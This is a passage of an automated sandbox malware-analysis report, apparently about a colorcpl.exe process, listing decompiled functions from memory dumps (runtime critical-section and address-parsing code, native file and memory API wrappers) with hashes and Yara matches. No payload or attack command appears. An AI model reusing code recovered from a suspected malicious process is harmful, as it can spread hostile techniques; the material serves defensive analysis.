							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xb720c0;
								if(_t85 != 0xb720c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00B1217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00AE3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x00abec56
0x00abec56
0x00abec56
0x00abec5c
0x00abec64
0x00af23e6
0x00af23eb
0x00af23eb
0x00abec6a
0x00abec6c
0x00abec6f
0x00af23f3
0x00af23f8
0x00af23fa
0x00af23fc
0x00abec75
0x00abec76
0x00abec76
0x00abec7b
0x00abec7c
0x00abec7e
0x00af2406
0x00af2407
0x00af240c
0x00af240d
0x00af240d
0x00af240d
0x00af2414
0x00af2417
0x00af241e
0x00af2435
0x00af2438
0x00af243c
0x00af243f
0x00af2442
0x00af2443
0x00af2446
0x00af2449
0x00af2453
0x00af2455
0x00af245b
0x00af245b
0x00abeb99
0x00abeb99
0x00abeb9c
0x00abeb9d
0x00abeb9f
0x00abeba2
0x00af2465
0x00af246b
0x00af246d
0x00abeba8
0x00abeba9
0x00abeba9
0x00abebae
0x00abebb3
0x00abebb9
0x00abebbb
0x00af2513
0x00af2514
0x00af2519
0x00af251b
0x00abec2a
0x00abec2d
0x00abec33
0x00abec36
0x00abec3a
0x00abec3e
0x00abec40
0x00abec47
0x00abec47
0x00abec40
0x00a922c6
0x00abebc1
0x00abebc1
0x00abebc5
0x00abec9a
0x00abec9a
0x00abebd6
0x00abebd6
0x00000000
0x00abebbb
0x00af2477
0x00af247c
0x00af2486
0x00af248b
0x00af2496
0x00af249b
0x00af249d
0x00af24a0
0x00af24a3
0x00af24aa
0x00af24aa
0x00af24a5
0x00af24a5
0x00af24a5
0x00af24ac
0x00af24af
0x00af24b0
0x00af24b3
0x00af24b9
0x00af24ba
0x00af24bb
0x00af24c6
0x00af24cb
0x00af24cd
0x00af24d0
0x00af24d1
0x00af24d4
0x00af24d6
0x00af24d9
0x00af24d9
0x00af24dc
0x00af24df
0x00af24e1
0x00af24e7
0x00af24e9
0x00af24ec
0x00af24ef
0x00af24f2
0x00af24f2
0x00af24ef
0x00af24e7
0x00af24fa
0x00af24ff
0x00af2501
0x00af2503
0x00af2506
0x00af250b
0x00abeb8c
0x00abeb93
0x00000000
0x00000000
0x00abeb93
0x00000000
0x00abeb99
0x00abec85
0x00abec85
0x00abec85
0x00000000

Strings

RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00AF248D
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00AF24BD
RTL: Re-Waiting, xrefs: 00AF24FA

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 27fba4ae548a037b73e865cb819be9cde5506b0eea98ab5c864d63e242ad458b
Instruction ID: 0545e49a600cd9bb50c92c43cec56351fcd6989edde003c6456845726e4102a9
Opcode Fuzzy Hash: 27fba4ae548a037b73e865cb819be9cde5506b0eea98ab5c864d63e242ad458b
Instruction Fuzzy Hash: DE41D771600204AFCB20DFA8CD85FAA77B8EF45720F208615F6599B2C2D774E9418761

Uniqueness

Uniqueness Score: -1.00%

Function 00ACFCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ACFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E00ACEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E00ACEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E00AC685D(_t167, 4) == 0) {
								if(E00AC685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E00AC685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E00AC685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00AA8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E00A9DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E00ACEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E00ACEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x00acfcd1
0x00acfcd6
0x00acfcd9
0x00acfcdc
0x00acfcdf
0x00acfce2
0x00acfce5
0x00acfce8
0x00acfceb
0x00acfced
0x00acfced
0x00acfcf3
0x00000000
0x00000000
0x00acfcfc
0x00acfcfe
0x00acfdc1
0x00afecbd
0x00000000
0x00afeccc
0x00afeccc
0x00afecd2
0x00000000
0x00000000
0x00afecdf
0x00afece0
0x00afece4
0x00afeceb
0x00afecee
0x00afeca8
0x00afeca8
0x00afecaa
0x00acfd76
0x00acfd79
0x00acfdb4
0x00acfdb5
0x00acfdb6
0x00000000
0x00acfdb6
0x00acfd7e
0x00afecfc
0x00acfe2f
0x00000000
0x00acfe2f
0x00afed08
0x00afed0f
0x00afed17
0x00afed1b
0x00000000
0x00afed1b
0x00acfd88
0x00000000
0x00000000
0x00acfd94
0x00acfd99
0x00acfda1
0x00000000
0x00000000
0x00acfdb0
0x00000000
0x00acfdb0
0x00afecbd
0x00acfdc7
0x00acfdcb
0x00000000
0x00acfdd7
0x00acfde3
0x00acfe06
0x00ae1fe7
0x00000000
0x00000000
0x00ae1fef
0x00ae1ff0
0x00ae1ff4
0x00ae1ff7
0x00ae1ffa
0x00ae1ffd
0x00ae2000
0x00000000
0x00000000
0x00afecf1
0x00000000
0x00afecf1
0x00000000
0x00acfe06
0x00acfde8
0x00acfdec
0x00acfdef
0x00acfdf2
0x00000000
0x00acfdf2
0x00acfdcb
0x00acfd04
0x00acfd05
0x00afec67
0x00000000
0x00000000
0x00afec6f
0x00000000
0x00afec6f
0x00acfd13
0x00acfd3c
0x00acfd40
0x00afec75
0x00afec7a
0x00000000
0x00afec8a
0x00afec8a
0x00afec90
0x00afecb2
0x00acfd73
0x00acfd73
0x00000000
0x00acfd73
0x00afec95
0x00000000
0x00000000
0x00afeca1
0x00afeca4
0x00afeca5
0x00000000
0x00afeca5
0x00afec7a
0x00acfd4a
0x00000000
0x00acfd6e
0x00acfd6e
0x00acfd71
0x00000000
0x00acfd71
0x00acfd4a
0x00acfd21
0x00ada3a1
0x00000000
0x00ada3a1
0x00acfd36
0x00ae200b
0x00ae2012
0x00000000
0x00000000
0x00ae2018
0x00000000
0x00ae2018
0x00000000
0x00acfd36
0x00acfe0f
0x00acfe16
0x00ada3ad
0x00000000
0x00000000
0x00ada3b3
0x00ada3b3
0x00acfe1f
0x00afed25
0x00afed86
0x00000000
0x00000000
0x00afed91
0x00afed95
0x00afed95
0x00afed9a
0x00afedad
0x00afedb3
0x00afedba
0x00afedc4
0x00afedc9
0x00000000
0x00afedcc
0x00afed2a
0x00afed55
0x00000000
0x00000000
0x00afed61
0x00afed66
0x00afed6e
0x00000000
0x00000000
0x00afed7d
0x00000000
0x00afed7d
0x00afed30
0x00000000
0x00000000
0x00afed3c
0x00afed43
0x00afed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 00ACFD94

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: d2eb26b27b49af0159d810e00b61aa7701485f9467295a054719b86b94da14f4
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: A6917E31E0024AEFDF28CF98C845BAEB7B6EF55305F25807EE511A7162E7305A41DB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: colorcpl.exe PID: 1572 Parent PID: 1388 colorcpl.exeCOMMON

Executed Functions

Function 00099D4D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D

Strings

wK, xrefs: 00099D6C, 00099D78
.z`, xrefs: 00099D8D, 00099D98

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`$wK
API String ID: 823142352-635088003
Opcode ID: 4bfeb38f07d00a9eab3efa889fd1538873feeeb4e3f2eac9c2b24a0d1cbe86c1
Instruction ID: ce65a0ca751aecafae59c64139254dc50e0d5c20d7cb382418f4925df2f86130
Opcode Fuzzy Hash: 4bfeb38f07d00a9eab3efa889fd1538873feeeb4e3f2eac9c2b24a0d1cbe86c1
Instruction Fuzzy Hash: 9401BDB2211208AFCB58DF98DC95EEB77ADBF8C754F158648FA1D97241C630E8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00099D50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D

Strings

wK, xrefs: 00099D6C, 00099D78
.z`, xrefs: 00099D8D, 00099D98

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`$wK
API String ID: 823142352-635088003
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 0a441b4dce64d7bec0249cb88b86821ea0342ac4fd6d7c1531e9a6fcd94e2e80
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 60F0BDB2200208AFCB08CF88DC95EEB77ADAF8C754F158248BA1D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00099DFA, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,000949F1,?,?,?,?,000949F1,FFFFFFFF,?,2M,?,00000000), ref: 00099E45

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 54a2e88a7dee086440cccae853537293336c089b83bd3b7d1926a00eaf5c3553
Instruction ID: cc007435d065098f17fc5a9ca3a5bfc606adfeaf8a6cd537ae83e50385fab7a7
Opcode Fuzzy Hash: 54a2e88a7dee086440cccae853537293336c089b83bd3b7d1926a00eaf5c3553
Instruction Fuzzy Hash: 0DF01DB6200145AFCB15DF9CD890CEB7BA9BF8D224B05864DFD5DA7202C630E855CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00099E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,000949F1,?,?,?,?,000949F1,FFFFFFFF,?,2M,?,00000000), ref: 00099E45

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: fead514cabe4814d174c9c8fb60ffadff092d031a689921e6f23a6cb00221d16
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 10F0A4B2200208AFCB14DF89DC91EEB77ADAF8C754F158248BE1D97241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00099E7A, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00094D10,?,?,00094D10,00000000,FFFFFFFF), ref: 00099EA5

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 5e4475c1db6cf0f54cd44c3cc18e2f516bba29b1a9cfb8c64ce12955b940bc67
Instruction ID: ce18eba2740a3bd1275b712d75e3f88d9d802fa7f6a64c79889b4046af966336
Opcode Fuzzy Hash: 5e4475c1db6cf0f54cd44c3cc18e2f516bba29b1a9cfb8c64ce12955b940bc67
Instruction Fuzzy Hash: 73E03976200214BBDB14EBDDDC42EE7B7ADEF88761F118559FA5C97242C630F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00099F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F69

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 49c918a45e5b2d10f2cbb8b42365379f4a3975464c59e5165204c3099a04dbe1
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 67F015B2200208AFCB14DF89CC81EEB77ADAF88750F118148BE1897241C630F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00099E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00094D10,?,?,00094D10,00000000,FFFFFFFF), ref: 00099EA5

Memory Dump Source

Source File: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 7bafa5a8a84721917e68a6eceee91e07c96d2fc345112c48b1fd92cb674e3066
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 38D01776600214ABDB10EB98CC86EE77BACEF49760F154499BA5C9B242C530FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 027000C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 027000CF

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 027007AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 027007B7

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 026FFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026FFAF3

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 026FFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026FFADB

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 026FFAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026FFAC3

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 026FFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026FFB73

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 026FFB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 026FFB5B

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
